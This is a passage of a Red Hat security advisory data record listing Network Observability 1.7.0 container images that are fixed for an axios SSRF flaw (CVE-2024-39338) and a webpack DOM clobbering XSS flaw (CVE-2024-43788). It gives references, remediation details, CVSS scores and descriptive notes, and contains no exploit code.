"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-39338", }, { category: "external", summary: "RHBZ#2304369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304369", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-39338", url: "https://www.cve.org/CVERecord?id=CVE-2024-39338", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", }, { category: "external", summary: "https://github.com/axios/axios/releases", url: "https://github.com/axios/axios/releases", }, { category: "external", summary: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", url: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", }, ], release_date: "2024-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "axios: axios: Server-Side Request Forgery", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", 